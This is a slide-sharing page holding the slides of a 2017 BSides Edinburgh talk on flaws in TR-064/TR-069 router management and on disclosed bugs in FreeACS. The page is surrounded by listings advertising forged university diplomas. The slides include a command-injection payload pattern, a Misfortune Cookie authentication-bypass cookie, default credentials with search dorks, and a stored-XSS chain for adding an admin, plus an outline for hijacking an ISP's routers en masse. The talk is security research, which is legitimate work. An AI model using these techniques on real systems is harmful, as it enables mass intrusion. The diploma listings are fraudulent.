成绩单ps(UST毕业证)圣托马斯大学毕业证成绩单快速办理成绩单ps(UST毕业证)圣托马斯大学毕业证成绩单快速办理
成绩单ps(UST毕业证)圣托马斯大学毕业证成绩单快速办理
ysasp1
 
Should Repositories Participate in the Fediverse?
Should Repositories Participate in the Fediverse?Should Repositories Participate in the Fediverse?
Should Repositories Participate in the Fediverse?
Paul Walk
 
Understanding User Behavior with Google Analytics.pdf
Understanding User Behavior with Google Analytics.pdfUnderstanding User Behavior with Google Analytics.pdf
Understanding User Behavior with Google Analytics.pdf
SEO Article Boost
 
学位认证网(DU毕业证)迪肯大学毕业证成绩单一比一原版制作
学位认证网(DU毕业证)迪肯大学毕业证成绩单一比一原版制作学位认证网(DU毕业证)迪肯大学毕业证成绩单一比一原版制作
学位认证网(DU毕业证)迪肯大学毕业证成绩单一比一原版制作
zyfovom
 
[HUN][hackersuli] Red Teaming alapok 2024
[HUN][hackersuli] Red Teaming alapok 2024[HUN][hackersuli] Red Teaming alapok 2024
[HUN][hackersuli] Red Teaming alapok 2024
hackersuli
 
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
APNIC
 
Ready to Unlock the Power of Blockchain!
Ready to Unlock the Power of Blockchain!Ready to Unlock the Power of Blockchain!
Ready to Unlock the Power of Blockchain!
Toptal Tech
 
7 Best Cloud Hosting Services to Try Out in 2024
7 Best Cloud Hosting Services to Try Out in 20247 Best Cloud Hosting Services to Try Out in 2024
7 Best Cloud Hosting Services to Try Out in 2024
Danica Gill
 
Search Result Showing My Post is Now Buried
Search Result Showing My Post is Now BuriedSearch Result Showing My Post is Now Buried
Search Result Showing My Post is Now Buried
Trish Parr
 
Discover the benefits of outsourcing SEO to India
Discover the benefits of outsourcing SEO to IndiaDiscover the benefits of outsourcing SEO to India
Discover the benefits of outsourcing SEO to India
davidjhones387
 
假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理
假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理
假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理
cuobya
 
Explore-Insanony: Watch Instagram Stories Secretly
Explore-Insanony: Watch Instagram Stories SecretlyExplore-Insanony: Watch Instagram Stories Secretly
Explore-Insanony: Watch Instagram Stories Secretly
Trending Blogers
 
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
eutxy
 
国外证书(Lincoln毕业证)新西兰林肯大学毕业证成绩单不能毕业办理
国外证书(Lincoln毕业证)新西兰林肯大学毕业证成绩单不能毕业办理国外证书(Lincoln毕业证)新西兰林肯大学毕业证成绩单不能毕业办理
国外证书(Lincoln毕业证)新西兰林肯大学毕业证成绩单不能毕业办理
zoowe
 
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
cuobya
 
一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理
一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理
一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理
keoku
 
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdf
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdfMeet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdf
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdf
Florence Consulting
 
不能毕业如何获得(USYD毕业证)悉尼大学毕业证成绩单一比一原版制作
不能毕业如何获得(USYD毕业证)悉尼大学毕业证成绩单一比一原版制作不能毕业如何获得(USYD毕业证)悉尼大学毕业证成绩单一比一原版制作
不能毕业如何获得(USYD毕业证)悉尼大学毕业证成绩单一比一原版制作
bseovas
 

Recently uploaded (20)

留学学历(UoA毕业证)奥克兰大学毕业证成绩单官方原版办理
留学学历(UoA毕业证)奥克兰大学毕业证成绩单官方原版办理留学学历(UoA毕业证)奥克兰大学毕业证成绩单官方原版办理
留学学历(UoA毕业证)奥克兰大学毕业证成绩单官方原版办理
 
办理毕业证(UPenn毕业证)宾夕法尼亚大学毕业证成绩单快速办理
办理毕业证(UPenn毕业证)宾夕法尼亚大学毕业证成绩单快速办理办理毕业证(UPenn毕业证)宾夕法尼亚大学毕业证成绩单快速办理
办理毕业证(UPenn毕业证)宾夕法尼亚大学毕业证成绩单快速办理
 
成绩单ps(UST毕业证)圣托马斯大学毕业证成绩单快速办理
成绩单ps(UST毕业证)圣托马斯大学毕业证成绩单快速办理成绩单ps(UST毕业证)圣托马斯大学毕业证成绩单快速办理
成绩单ps(UST毕业证)圣托马斯大学毕业证成绩单快速办理
 
Should Repositories Participate in the Fediverse?
Should Repositories Participate in the Fediverse?Should Repositories Participate in the Fediverse?
Should Repositories Participate in the Fediverse?
 
Understanding User Behavior with Google Analytics.pdf
Understanding User Behavior with Google Analytics.pdfUnderstanding User Behavior with Google Analytics.pdf
Understanding User Behavior with Google Analytics.pdf
 
学位认证网(DU毕业证)迪肯大学毕业证成绩单一比一原版制作
学位认证网(DU毕业证)迪肯大学毕业证成绩单一比一原版制作学位认证网(DU毕业证)迪肯大学毕业证成绩单一比一原版制作
学位认证网(DU毕业证)迪肯大学毕业证成绩单一比一原版制作
 
[HUN][hackersuli] Red Teaming alapok 2024
[HUN][hackersuli] Red Teaming alapok 2024[HUN][hackersuli] Red Teaming alapok 2024
[HUN][hackersuli] Red Teaming alapok 2024
 
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
 
Ready to Unlock the Power of Blockchain!
Ready to Unlock the Power of Blockchain!Ready to Unlock the Power of Blockchain!
Ready to Unlock the Power of Blockchain!
 
7 Best Cloud Hosting Services to Try Out in 2024
7 Best Cloud Hosting Services to Try Out in 20247 Best Cloud Hosting Services to Try Out in 2024
7 Best Cloud Hosting Services to Try Out in 2024
 
Search Result Showing My Post is Now Buried
Search Result Showing My Post is Now BuriedSearch Result Showing My Post is Now Buried
Search Result Showing My Post is Now Buried
 
Discover the benefits of outsourcing SEO to India
Discover the benefits of outsourcing SEO to IndiaDiscover the benefits of outsourcing SEO to India
Discover the benefits of outsourcing SEO to India
 
假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理
假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理
假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理
 
Explore-Insanony: Watch Instagram Stories Secretly
Explore-Insanony: Watch Instagram Stories SecretlyExplore-Insanony: Watch Instagram Stories Secretly
Explore-Insanony: Watch Instagram Stories Secretly
 
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
 
国外证书(Lincoln毕业证)新西兰林肯大学毕业证成绩单不能毕业办理
国外证书(Lincoln毕业证)新西兰林肯大学毕业证成绩单不能毕业办理国外证书(Lincoln毕业证)新西兰林肯大学毕业证成绩单不能毕业办理
国外证书(Lincoln毕业证)新西兰林肯大学毕业证成绩单不能毕业办理
 
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
 
一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理
一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理
一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理
 
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdf
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdfMeet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdf
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdf
 
不能毕业如何获得(USYD毕业证)悉尼大学毕业证成绩单一比一原版制作
不能毕业如何获得(USYD毕业证)悉尼大学毕业证成绩单一比一原版制作不能毕业如何获得(USYD毕业证)悉尼大学毕业证成绩单一比一原版制作
不能毕业如何获得(USYD毕业证)悉尼大学毕业证成绩单一比一原版制作
 

BSides Edinburgh 2017 - TR-06FAIL and other CPE Configuration Disasters

  • 1. TR-06FAIL AND OTHER CPE CONFIGURATION MANAGEMENT DISASTERS
  • 2. ABOUT.ME • Security Researcher at Xiphos Research • Been poking embedded stuff with a pointy stick for ages. • Formerly: Forensics student, pharmaceuticals student, internet miscreant… • “Proper Bad Dodgy”, “Unprofessional”, “Childish”, “A bad influence”…
  • 3. WHAT WE WILL BE TALKING ABOUT • The TR-064 Protocol – and related vulnerabilities (TR-06FAIL, etc…) • The TR-069 Protocol – and related vulnerabilities (Misfortune Cookie, etc…) • Hacking ACS Servers for World Domination. • Other Stuff in No Particular Order.
  • 4. BEFORE WE BEGIN • See the excellent prior art on this subject by Shahar Tal. • “I Hunt TR-069 Admins” and the “Misfortune Cookie” research. • Also, worth reading the specs I link to and trying some of this for yourself.
  • 5. FIRSTLY, A PRIMER ON TR-XXX • TR-XXX are DSL Forum Specifications. • Basically define specifications for protocols and such to manage broadband networks for ISP’s to follow/implement/ignore. • Of interest today are TR-064 and TR-069, but there are many others…
  • 6. TR-064 • TR-064 is “LAN-Side DSL CPE Configuration”. • Specification outlines a SOAP based protocol to allow configuration of CPE devices from the LAN side, for example, by “Broadband Setup” software shipped to consumers. • https://www.broadband-forum.org/technical/download/TR- 064.pdf
  • 7. TR-069 • “CPE WAN Management Protocol” (CWMP) • Outlines the protocol for management of CPE devices over WAN. Also SOAP based, and disgustingly complicated at first glance. • https://www.broadband-forum.org/technical/download/TR- 069_Amendment-5.pdf (yes, its on version 5…)
  • 8. LETS TALK ABOUT TR-064 A BIT… • TR-064 allows managing ANY setting on a CPE device. • (provided you are on the LAN side of the device…) • Has total read/write to full device configuration. • ACS Configuration (for TR-069 access…) • DNS settings… • Wireless Security settings… • Actually comes with some “security” requirements…
  • 9. TR-064 SECURITY SPECIFICATIONS • “Access to any action that allows configuration changes to the CPE MUST be password protected.” • “Access to any password-protected action MUST require HTTP digest authentication.” • “Sensitive information, such as passwords, MUST NOT be readable at all.” • Its also only meant to listen on the LAN interface…
  • 10.
  • 11. TR-064 SECURITY REALITIES, OR “TR- 06FAIL” • Password Protected? Oh hell no! • Actual credentials (WiFi keys…) readable in plaintext? Oh hell yes! • Accessible via the internet? Oh hell yes! • BONUS TRIVIAL COMMAND INJECTION VULN? WHY NOT?!
  • 12. SO WHAT IS THE OBVIOUS OUTCOME OF THIS?
  • 13. WELL, DEUTSCHE TELEKOM HAD SOME ISSUES…
  • 14. AS DID TALKTALK… AND POST OFFICE… ETC… Everyone had a bad time with this… TalkTalk, Eircom, Post Office, Demon, etc…
  • 15. SO, WHO DID IT? WHERE IS THE ATTRIBUTION PARTY?
  • 16. NATURALLY, SKIDDIES… I know you can’t actually read this. But it’s the source code of one of the TR-064 exploits that script kiddies are using to spread malware… The important part is: <NewNTPServer1> `commands here` </NewNTPServer1> … Trivial command injection 
  • 17. THIS WAS NOT THE FIRST TIME, EITHER… • Before TR-06FAIL happened, we had Misfortune Cookie. • Affected the same RomPager server. • Affected the TR-069 component. • Allowed remotely accessing the device without authentication, due to what was effectively a write-what-where kind of issue.
  • 18. MISFORTUNE COOKIE TL;DR • Allows overwriting internal state variables on the TR-069 service on the router. • Below is from a PoC from Kenzo, exploits Eircom "P-660HW-T1 v3“. • #Bypass the CWMP port check. Bypass the password check • headers = {"Cookie": "C88605=AAAAAAAA;C107257012=x08x0bx27x19x66x 40xb0x21;C107257012=x08x0bx27x19"}
  • 19. LETS TALK ABOUT TR-069… • Another DSL Forum Specification. • Has a bit about security in it. • Supports TLS! And Authentication! • Protocol is a total fucking mess. “Designed by Committee” kind of crap.
  • 20. TR-069… • SSL/TLS is totally optional. • Some setups are super solid, with mutual auth (client-side certs, pinning…), others are plaintext. • Authentication? Also kind of optional. • CPE to ACS often uses basic-auth… Kinda. It often uses the “username” as an identifier. • ACS to CPE is often TLS (client cert) but can be shared secret without TLS.
  • 21. TR-069… • Lots of XML trash in the protocol. • Built on STUN, SOAP, and also there is parts of it that use XMPP… • Attack surface is immense.
  • 22. SO, WE KNOW THE CPE END IS A CROCK OF SHIT. • What about the ISP end? • Surely the ISP are securing their servers very, very well? • Surely the ISP ACS software is ROCK SOLID ENTERPRISE SOFTWARE!?!? • Surely TR-069 can’t be as bad as you say, right?
  • 23. AND NOW FOR THE SECOND ACT IN WHICH WE GO HACK THE PLANET.
  • 25. WORLD DOMINATION • So, say, we wanted to hack CPE devices en-masse. • But we did not feel particularly inclined to actually go hack them one at a time, even with botnet/scanning/etc… • We want to do them all in one go…
  • 26. I DECIDED TO START AUDITING ACS SERVERS. • Hacking an ACS server is way quicker than hacking millions of CPE’s one at a time. • Auditing has gone slowly. Free time project. • In todays talk, we discuss some hilarious 0day in FreeACS.
  • 27. DISCLOSURE TIMELINE(S) • At some point in the last while: Found bugs in FreeACS • Between then and now: Worked on weaponizing Said Bugs. • Today: Public Disclosure of Said Bugs.
  • 28. FREEACS • FreeACS has been around for absolutely ages. • Seems to be maintained by one person, maybe a small group… • Technologies Used: • Apache Tomcat (ew, Java) • MySQL
  • 29. FREEACS • “The Most Complete TR-069 ACS available for free under the MIT License.” • Most Complete = Most Attack Surface. • I don’t think I have even scratched the surface here…
  • 30. WHY FREEACS? WELL, THIS SMELLS FUNNY…
  • 31. LOWEST HANGING FRUIT • Default Login Credentials: admin/xaps (do people change this?) • Shodan: title:FreeACS • Google: intitle:”FreeACS Web Web” • Try Censys.io, Bing, etc… Scan some ports… Etc 
  • 32. POST-AUTH IS MADE OF XSS WITH OPTIONAL ACS • Found a bunch of reflected XSS vulns post-auth. • Pretty much every parameter ever will reflect some XSS. • Post-Auth, so who cares, but have some screenshots anyway…
  • 33.
  • 34.
  • 35.
  • 36. WE WANT THE FOLLOWING THINGS… • Pre-Authentication (can’t rely on cracking a login or default credentials) • Remote (exploitable over the internet.) • Privileged Access (gives us “Admin” role on the ACS server) • Easy (because, lets face it, we want to do world domination on the cheap!)
  • 37. WHAT’S THE PRE-AUTH ATTACK SURFACE? • Well, its pretty huge. • Easiest is to attack from the perspective of a TR-069 client. • So I set about creating a valid CWMP Notify message to send.
  • 39. WE TRIED FUZZING THE XML… • I got my testing instance to cease responding a bunch of times. • I got bored really, really fast. • So I thought back to “is there something else I can attack here?”
  • 40. TR-069/CWMP NOTIFY MESSAGES • So there’s the XML. • What is missing in that example is the auth. • It uses Basic Auth.
  • 41. CWMP NOTIFY AND BASIC AUTH. • Turns out the HTTP Basic Auth “username” is used to denote which device. • Used as a unique identifier. • So its input into things and messed with… And Basic Auth is a loose spec of user input…
  • 42. THE POSSIBLY UNEXPLOITABLE… • TL;DR: The Basic-Auth username is passed into a SQL query with no sanitizing. • It leads to a fairly trivial SQL injection vulnerability (in theory). • However, there is a char-length limit that meant I couldn’t get anything working easily. Someone else might figure it out. • You CAN cause a perma-DoS of the ACS, however, with a broken SQL statement…
  • 43. THE EASILY EXPLOITABLE • Username is totally unsanitized. • Username shows up in the UI a load of times when doing ACS admin things. • So maybe we can get some nice XSS?
  • 44. PERSISTENT XSS IN ADMIN • TL;DR it worked. • Persistent XSS in admin area via a CWMP Notify Message. • Some payload limitations – char length and the likes…
  • 46. POC – INJECTING A REMOTE SCRIPT…
  • 47. SO WE CAN INJECT REMOTE JS INTO ADMIN… • Now lets fully take over the ACS… • I figured the easiest way to do this is to add a new admin user… • So lets look at how that plays out…
  • 48. ADDING A NEW ADMIN USER • It is just a POST request. • No CSRF tokens or XSS protection going on here. • We can do this in JavaScript we copy and pasted from Stack Overflow!
  • 49. ADDING ADMIN USER VIA XSS POC…
  • 50. ADDING ADMIN USER VIA XSS POC
  • 51. ADMIN USER NAMED HACKER ADDED ;)
  • 52. SO… WHAT DO… • Scan Internet/Shodan/Censys/Google for FreeACS Servers. • Inject our XSS via CWMP NOTIFY message. • Wait a while for payloads to fire… • Hack the Planet!
  • 53. WHAT WE CAN DO WITH HACKED ACS? • We can reconfigure settings on all clients (think: all users of ISP) • Change everyones DNS servers for mass pharming attack or worse :D • We can reflash firmwares on all clients – persistent mass rootkitting. • Imagine the cleanup costs of this? • We can probably mess with billing or provision new devices, perhaps…
  • 54. WITH A BIT OF HACKED ACS… WE ARE LIKE THIS!
  • 55. THANKS • BSides Edinburgh Organizers! • Shahar Tal, kenzo, and others for the prior-art. • Coworkers and friends (LizardHQ, etc…) for helping • Cybergibbons and Ken from PTP • The DSL Forum, for writing hilarious specs. • Vendors and software developers for keeping me in a job. • You, for putting up with this utter nonsense 
  • 56. YOU MAY SUBSCRIBE TO MY NEWSLETTER • Email (which constantly goes unanswered): darren.martyn@xiphosresearch.co.uk • XMPP (will be ignored if you don’t use OTR…): infodox@jabber.ccc.de • Twitter (actually might get a response!) @info_dox • mastodon.social (the new super hip not-twitter thing) @lsd